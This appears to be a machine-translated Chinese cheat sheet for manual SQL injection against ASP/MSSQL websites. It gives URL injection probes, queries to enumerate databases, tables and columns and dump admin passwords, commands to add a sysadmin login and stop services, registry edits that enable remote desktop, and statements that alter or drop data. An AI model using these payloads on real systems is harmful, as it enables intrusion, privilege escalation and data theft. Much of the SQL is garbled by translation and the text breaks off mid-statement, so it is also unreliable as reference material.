手工mssql注入（Manual MSSQL injection）.docVIP

手工mssql注入（Manual MSSQL injection） 存在（SELECT * FROM sysobjects）/判断是否是MSSQL 存在（SELECT * FROM tablename）/判断某表是否存在TableName为表名.. 1 =（版本）/ MSSQL版本 1 =（选择db_name()）/当前数据库名 1 =（选择@ @ ServerName）/本地服务名 1 =（选择is_srvrolemember（sysadmin ））/判断是否是系统管理员 1 =（选择is_member（db_owner ））/判断是否是库权限 1 =（选择has_dbaccess（“主人”））/判断是否有库读取权限 1 =（选择的名字，从master.dbo.sysdatabases DBID = 1）/暴库名DBID为1,2,3的… ；声明int /是否支持多行D 1 =（select count（*）从哪里master.dbo.sysobjects xtype =“X”和名称=“xp_cmdshell ）/判断xp_cmdshell是否存在 1 =（select count（*）从master.dbo.sysobjects name =“xp_regread ）/查看xp_regread扩展存储过程是不是已经被删除 添加和删除一个SA权限的用户测试：（需要SA权限） 执行master.dbo.sp_addlogin测试，密码 执行master.dbo.sp_addsrvrolemember测试，系统管理员 停掉或激活某个服务（需要SA权限）。 执行主.. xp_servicecontrol 停止，schedule” 执行主.. xp_servicecontrol 开始，schedule” 暴网站目录 创建表labeng（拉拉nvarchar（255），ID int） 声明@结果varchar（255）执行master.dbo.xp_regread”hkey_local_machine，controlset001 \服务\系统\ W3SVC \参数\虚拟根目录”、“/”、“结果输出插入labeng（拉拉）值（@结果）； 1 =（从labeng选择前1或者拉拉）1 =（select count（*）从哪里labeng拉拉 1） -----------------------------------------------------分割 3389并修改端口号DOS下开 SC配置来说开始=汽车 启动来说 / /允许外连 注册地址“hkey_local_machine \系统\ CurrentControlSet \控制\终端服务器”/ V fdenytsconnections / T reg_dword / D / F 0 该端口到80 / 3389 注册地址“hkey_local_machine \系统\ CurrentControlSet \控制\终端服务器winstations \ RDP TCP端口号/ V / T reg_dword / 80 / f SQL Server 判断是否可注射： /article.asp？ID = 6 /article.asp？id = 6 /article.asp？id = 6和1 = 1 /article.asp？id = 6和1 = 2 /article.asp？动作=值和1 = 1 /article.asp？动作=值和1 = 2 searchpoints %和1 = 1 searchpoints %和1 = 2 确定数据库类型： /article.asp？id = 6和用户 0 /article.asp？ID = 6（select count（*）从sysobjects） 0 查询当前用户数据信息： article.asp？id = 6，具有1＝1 暴当前表中的列： article.asp？ID = 6组有1 = 1 admin.username -- article.asp？ID = 6组管理员用户名，admin.password 1 = 1 暴任意表和列： 和（选择前1名（选择前N个ID，名字中，X型= char（85））T订单ID号） 1 和（选择上col_name（object_id（admin ），n）从sysobjects） 1 暴数据库数据： 和（从管理员id是N）选择前1名的密码 1 修改数据库中的数据： ；更新管理设置密码=“oooooo在用户名= xxx” Add data to the database: Insert, into, admin, values (XXX, oooooo) - Delete database: Drop, database,